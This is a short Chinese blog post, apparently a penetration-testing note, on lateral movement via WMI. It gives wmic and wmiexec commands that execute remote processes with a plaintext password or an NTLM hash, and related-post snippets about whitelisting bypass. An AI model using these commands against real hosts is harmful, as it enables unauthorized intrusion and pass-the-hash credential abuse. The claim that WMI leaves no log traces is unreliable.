横向移动-传递攻击WMI服务利用cscript&vmiexec&wmic

已于 2023-05-28 01:22:19 修改
阅读量208 收藏
点赞数
分类专栏: 横向移动 文章标签: 运维
于 2023-05-28 01:19:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65096687/article/details/130908185
版权

wim是通过135端口进行利用的,支持明文和hash的方式进行认证,并且不会在目标系统日志下留下痕迹

VMIC(明文传递,官方自带,无回显)

wmic /node:192.168.52.129 /user:liukaifeng01 /password:P@ssw0rd process call create "cmd.exe /c ipconfig >C:\1.txt"


把ipconfig 执行后内容输入到对方c盘的1.txt

成功

cscript(明文传递,官方自带,有回显)

这个需要wmiexec.vbs这个配合使用

vmiexec(支持hash,有回显,第三方)

明文

wmiexec ./用户名:密码@对方ip "whoami"

成功一半,返回权限不是system 。但可以提权

hash

wmiexec -hashes 值 ./用户@对方ip "whoami"

不过是三年五载
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wmic命令行介绍及使用.pdf
09-07
该文档详细记录了Windows Management InstrumentationCommand Line(Windows管理工具命令行)的基本使用,这对渗透测试进内网进行横向移动有很大帮助。
clevo-xsm-wmi:https的克隆
05-11
clevo-xsm-wmi 用于Clevo SM系列笔记本电脑的键盘背光的内核模块。 (以及几种EM / ZM / DM系列型号) 基于TUXEDO Computers GmbH创建的tuxedo-wmi。 在tuxedo-wmi上的添加 Sysfs界面可在模块加载后控制亮度,...
内网横向移动常用方法总结
da_chuan_chuan的博客
04-27 3743
文章目录前言一、通过at&schtasks进行明文传递二、、atexec进行明文与HASH传递三、SMB 服务利用1、psexec工具传递2、smbexec工具传递四、WMI 服务利用1、wmic传递2、cscript传递3、wmiexec传递五、PTH横向传递攻击六、PTK横向传递攻击二、使用步骤1.引入库2.读入数据总结 前言 当我们拿下webshell后,若其服务器有内网环境,在进一步测试中就需要进行内网渗透测试,对于内网渗透测试的方法常用的为:基于口令的横向移动和基于漏洞的攻击。本文主要从基
域渗透-横向移动命令总结
m0_60571990的博客
12-02 804
域渗透-横向移动命令总结
使用wmic.exe绕过应用程序白名单(多种方法)
weixin_30764137的博客
03-07 1241
一、Wmic.exe wmic实用程序是一款Microsoft工具,它提供一个wmi命令行界面,用于本地和远程计算机的各种管理功能,以及wmic查询,例如系统设置、停止进程和本地或远程运行脚本。因此,它可以调用XSL脚本来执行。 二、攻击方法 1.第一种方法:Koadic 我们将在Koadic的帮助下生成一个恶意的XSL文件,它是一个命令和控制工具,与Metasploit和Power...
内网安全:WMI协议与SMB协议横向移动
qq_61553520的博客
08-24 1914
此外,SMB协议还经过不断的发展和改进,最新的版本是SMB3,它引入了更高的性能和安全性特性。它是在局域网(LAN)中广泛使用的一种协议,最初由IBM开发,后来由微软引入并逐渐发展为现代的SMB协议。WMI协议的主要目标是提供一种统一的接口,使系统管理员和开发人员能够通过编程方式获取和控制Windows操作系统的各种管理信息。通过WMI协议,可以访问和操作计算机的硬件、操作系统、网络、进程、服务等各个方面的信息。SMB协议的作用是允许计算机之间共享文件和资源,并提供对这些共享资源的访问和管理。
第一百零八课:跨平台横向移动 [wmi利用]1
08-03
虽然WMI本身是Windows特有的,但攻击者可能通过模拟WMI协议或利用其他方式在非Windows系统上实现类似的功能,以达到横向移动的目的。 【总结】 WMI是Windows系统管理和自动化的重要工具,同时也是安全领域中攻击者...
node-wmic:WMIC周围的Node.js包装器
05-11
节点wmic WMIC周围的Node.js包装器。 将每个WMIC命令输出转换为JavaScript数组。 注意,这是支持所有WMIC命令的v2版本,与v1版本不兼容。 对于1.0.0+版本,请签出分支。 var wmic = require ( 'node-wmic' ) ; ...
asus-nb-wmi.rar_Welcome!_asus wmi
09-22
【标题】"asus-nb-wmi.rar_Welcome!_asus wmi" 提供的是一款专为华硕笔记本电脑设计的WMI热键驱动程序,欢迎有需求的朋友下载分享。 【华硕笔记本WMI热键驱动】是华硕笔记本用户必备的软件组件之一,它主要负责处理...
go-wmi-hyper-v.txt
09-28
go通过调用Windows wmi 生成hyper-v虚拟机,不包括修改内存,CPU等操作
wmic常用指令:
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
03-27 478
wmic使用收集、wmic远程注册表、wmic远程进程创建、wmic远程任务创建、wmic远程服务启动
内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递
网络安全领域___专研者.
06-09 2667
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
p67 内网安全-域横向 smb&wmi 明文或 hash 传递
weixin_43263566的博客
04-24 564
p67 内网安全-域横向 smb&wmi 明文或 hash 传递
WMI使用学习笔记
crowsec
10-21 3867
本文大量参考了师傅们的文章,感谢各位师傅的帮助! WMI的全名为"Windows Management Instrumentation"。 从win98开始,Windows操作系统都支持WMIWMI可以在本地或者远程管理计算机系统。比如:重启,关机,关闭进程,创建进程等。
横向渗透之PSExec、SMBExecWMIExec的使用及特征
最新发布
weixin_65550121的博客
12-09 1978
支持单向、双向通信。攻击者通过PSEXEC连接到远程机器并通过命名管道执行命令,命名管道是通过一个随机命名的二进制文件创建的,这个文件被写入到远程机器上的ADMIN$共享,最后通过SVCManager用来创建服务。建立连接之后,我们执行notepad.exe,可以发现它卡在这了,这因为我们在等待远程机器的输入,然而它永远不会输入。首先我们通过PSEXEC横向的时候,这里上传了一个文件名字叫SBxFixsS.exe的文件,也就是说将这个文件写入到了远程机器的ADMIN$共享中,我们可以查看一下共享目录。
2022-10-03笔记(内网横向)
qq_45751902的博客
10-03 689
日常笔记
内网安全 - 域横向 smb&wmi
acepanhuan的博客
03-15 292
通过官方PSTools中psexec连接时只能用明文密码进行连接,但是不会被杀毒软件拦截通过官方自带命令WMIC时,只支持明文且没有回显需自己读取通过官方自带命令cscriptwmiexec.vbs配合时有回显,但是只支持明文通过非官方impacket-examples-windows中psexec和smbexecwmiexec连接时可支持密文hash密码连接,但容易被杀毒软件拦截现在基本通过mimikatz获取的密码都是密文的impacket-examples-windows下载地址。
内网渗透-最实用的横向移动总结
告白的博客
10-04 5717
0x00 内网横向移动简介 上期介绍了内网的信息收集,接下来一度时间实现内网的横向移动,内网的渗透过程一一介绍,通过内网主机掌控整个域环境。 0x01 内网横向移动的两种方式 内网的横向移动的方式有传递和漏洞两种: 所谓传递就是通过内置的一系列协议与命令,例如:at,schtasks,psexec,smbexecwmic,PTH,PTT,PTK等,实现达到渗透其他内网主机,所谓的内网渗透其实就是一个内网的信息收集,掌握了域内的账户密码信息,主机信息,也就掌握了整个域,我们就是要通过横向移动的方式去获取到
内网横移之WMIexec
Canterlot的博客
09-04 3099
本文详细介绍了WMIexec的运行原理及特点,命令执行过程,相关工具用法等
wmic wmi 什么关系
06-09
WMIC(Windows Management Instrumentation Command-line)是一种命令行实用程序,允许用户通过命令行界面访问和查询 Windows Management Instrumentation(WMI)信息。WMI是一种微软的系统管理技术,它可以提供有关...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值